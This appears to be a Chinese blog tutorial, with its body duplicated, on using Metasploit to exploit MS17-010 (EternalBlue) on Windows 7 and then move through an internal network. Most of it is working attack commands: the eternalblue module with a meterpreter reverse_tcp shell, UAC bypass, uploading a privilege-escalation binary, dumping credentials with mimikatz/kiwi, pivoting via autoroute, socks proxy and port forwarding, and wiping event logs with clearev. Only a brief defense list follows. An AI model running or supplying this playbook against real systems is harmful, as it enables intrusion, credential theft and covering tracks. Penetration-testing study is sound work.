1. 认识Metasploit与MS17-010漏洞第一次接触Metasploit框架时我被它强大的模块化设计震撼到了。这个用Ruby编写的开源工具就像瑞士军刀把渗透测试中需要的扫描、漏洞利用、后渗透等功能都整合在了一起。在Kali Linux中默认就安装了Metasploit输入msfconsole命令就能进入这个神奇的世界。MS17-010漏洞永恒之蓝是近年来影响最广泛的Windows漏洞之一。它利用了SMB协议的文件共享功能中的缺陷攻击者可以通过445端口发送特制数据包来执行任意代码。我曾在测试环境中复现这个漏洞发现即使是不打补丁的Windows 7系统从扫描到获取系统权限最快只要2分钟。2. 环境准备与目标识别在开始实战前我们需要准备好这些基础环境Kali Linux系统已内置Metasploit测试用的Windows靶机建议使用Windows 7 SP1确保攻击机和靶机网络互通目标识别阶段我习惯用组合拳nmap -sP 192.168.1.0/24 # 快速扫描存活主机 nmap -A -T4 192.168.1.105 # 全面扫描操作系统和服务当看到这样的结果时就要提高警惕了PORT STATE SERVICE VERSION 445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 13. 漏洞利用实战步骤3.1 漏洞扫描确认在msfconsole中加载扫描模块use auxiliary/scanner/smb/smb_ms17_010 set RHOSTS 192.168.1.105 run看到[] 192.168.1.105:445 - Host is likely VULNERABLE to MS17-010!这样的提示就像找到了金矿的入口。3.2 发起攻击选择永恒之蓝攻击模块use exploit/windows/smb/ms17_010_eternalblue set RHOST 192.168.1.105 set LHOST 192.168.1.100 # 你的Kali IP set payload windows/x64/meterpreter/reverse_tcp exploit成功时会看到熟悉的meterpreter提示符这时可以运行sysinfo验证权限。我遇到过不少次攻击失败的情况通常是目标系统打了补丁或者防火墙拦截这时候可以尝试ms17_010_psexec模块作为备选方案。4. 后渗透操作指南4.1 基础信息收集拿到meterpreter会话后我通常会按这个顺序收集信息sysinfo # 系统信息 run post/windows/gather/checkvm # 检查是否虚拟机 run post/windows/gather/enum_applications # 安装的软件列表4.2 权限提升技巧虽然getsystem命令可以尝试提权但在Win7环境下我更推荐use exploit/windows/local/bypassuac set SESSION 1 run如果失败可以上传提权工具如upload /usr/share/windows-binaries/pr.exe C:\\ shell cd C:\\ pr.exe4.3 密码获取实战最有效的方式是加载mimikatzload kiwi creds_all我曾用这个方法获取过域管理员的明文密码记得有一次发现管理员所有平台都用同一个密码直接拿下了整个内网。5. 内网横向移动策略5.1 网络拓扑探测先添加路由run autoroute -s 192.168.1.0/24然后用内置扫描器探测内网use auxiliary/scanner/portscan/tcp set PORTS 135,445,3389 set RHOSTS 192.168.1.100-200 run5.2 代理与端口转发建立socks代理use auxiliary/server/socks_proxy set VERSION 4a run配置proxychains后就能扫描内网其他机器了。对于特定服务我更常用端口转发portfwd add -l 3389 -p 3389 -r 192.168.1.110然后直接rdesktop连接本地的3389端口即可。6. 痕迹清理与防御建议6.1 清理日志结束前别忘了clearev6.2 防御措施根据实战经验我总结了几点有效防御措施及时安装系统补丁关闭不必要的445端口启用Windows防火墙使用强密码策略定期检查系统日志在最近的一次企业安全评估中我们发现虽然打了MS17-010补丁但内网中仍有大量机器使用弱密码通过密码喷洒拿到了多台服务器权限。安全防护一定要多层次、全方位不能只依赖补丁修复。
Metasploit实战:从MS17-010漏洞利用到内网横向渗透
发布时间:2026/6/7 15:04:51
1. 认识Metasploit与MS17-010漏洞第一次接触Metasploit框架时我被它强大的模块化设计震撼到了。这个用Ruby编写的开源工具就像瑞士军刀把渗透测试中需要的扫描、漏洞利用、后渗透等功能都整合在了一起。在Kali Linux中默认就安装了Metasploit输入msfconsole命令就能进入这个神奇的世界。MS17-010漏洞永恒之蓝是近年来影响最广泛的Windows漏洞之一。它利用了SMB协议的文件共享功能中的缺陷攻击者可以通过445端口发送特制数据包来执行任意代码。我曾在测试环境中复现这个漏洞发现即使是不打补丁的Windows 7系统从扫描到获取系统权限最快只要2分钟。2. 环境准备与目标识别在开始实战前我们需要准备好这些基础环境Kali Linux系统已内置Metasploit测试用的Windows靶机建议使用Windows 7 SP1确保攻击机和靶机网络互通目标识别阶段我习惯用组合拳nmap -sP 192.168.1.0/24 # 快速扫描存活主机 nmap -A -T4 192.168.1.105 # 全面扫描操作系统和服务当看到这样的结果时就要提高警惕了PORT STATE SERVICE VERSION 445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 13. 漏洞利用实战步骤3.1 漏洞扫描确认在msfconsole中加载扫描模块use auxiliary/scanner/smb/smb_ms17_010 set RHOSTS 192.168.1.105 run看到[] 192.168.1.105:445 - Host is likely VULNERABLE to MS17-010!这样的提示就像找到了金矿的入口。3.2 发起攻击选择永恒之蓝攻击模块use exploit/windows/smb/ms17_010_eternalblue set RHOST 192.168.1.105 set LHOST 192.168.1.100 # 你的Kali IP set payload windows/x64/meterpreter/reverse_tcp exploit成功时会看到熟悉的meterpreter提示符这时可以运行sysinfo验证权限。我遇到过不少次攻击失败的情况通常是目标系统打了补丁或者防火墙拦截这时候可以尝试ms17_010_psexec模块作为备选方案。4. 后渗透操作指南4.1 基础信息收集拿到meterpreter会话后我通常会按这个顺序收集信息sysinfo # 系统信息 run post/windows/gather/checkvm # 检查是否虚拟机 run post/windows/gather/enum_applications # 安装的软件列表4.2 权限提升技巧虽然getsystem命令可以尝试提权但在Win7环境下我更推荐use exploit/windows/local/bypassuac set SESSION 1 run如果失败可以上传提权工具如upload /usr/share/windows-binaries/pr.exe C:\\ shell cd C:\\ pr.exe4.3 密码获取实战最有效的方式是加载mimikatzload kiwi creds_all我曾用这个方法获取过域管理员的明文密码记得有一次发现管理员所有平台都用同一个密码直接拿下了整个内网。5. 内网横向移动策略5.1 网络拓扑探测先添加路由run autoroute -s 192.168.1.0/24然后用内置扫描器探测内网use auxiliary/scanner/portscan/tcp set PORTS 135,445,3389 set RHOSTS 192.168.1.100-200 run5.2 代理与端口转发建立socks代理use auxiliary/server/socks_proxy set VERSION 4a run配置proxychains后就能扫描内网其他机器了。对于特定服务我更常用端口转发portfwd add -l 3389 -p 3389 -r 192.168.1.110然后直接rdesktop连接本地的3389端口即可。6. 痕迹清理与防御建议6.1 清理日志结束前别忘了clearev6.2 防御措施根据实战经验我总结了几点有效防御措施及时安装系统补丁关闭不必要的445端口启用Windows防火墙使用强密码策略定期检查系统日志在最近的一次企业安全评估中我们发现虽然打了MS17-010补丁但内网中仍有大量机器使用弱密码通过密码喷洒拿到了多台服务器权限。安全防护一定要多层次、全方位不能只依赖补丁修复。
)
)
:多栏目适配开发 - 通用解析规则兼容差异化网页结构)
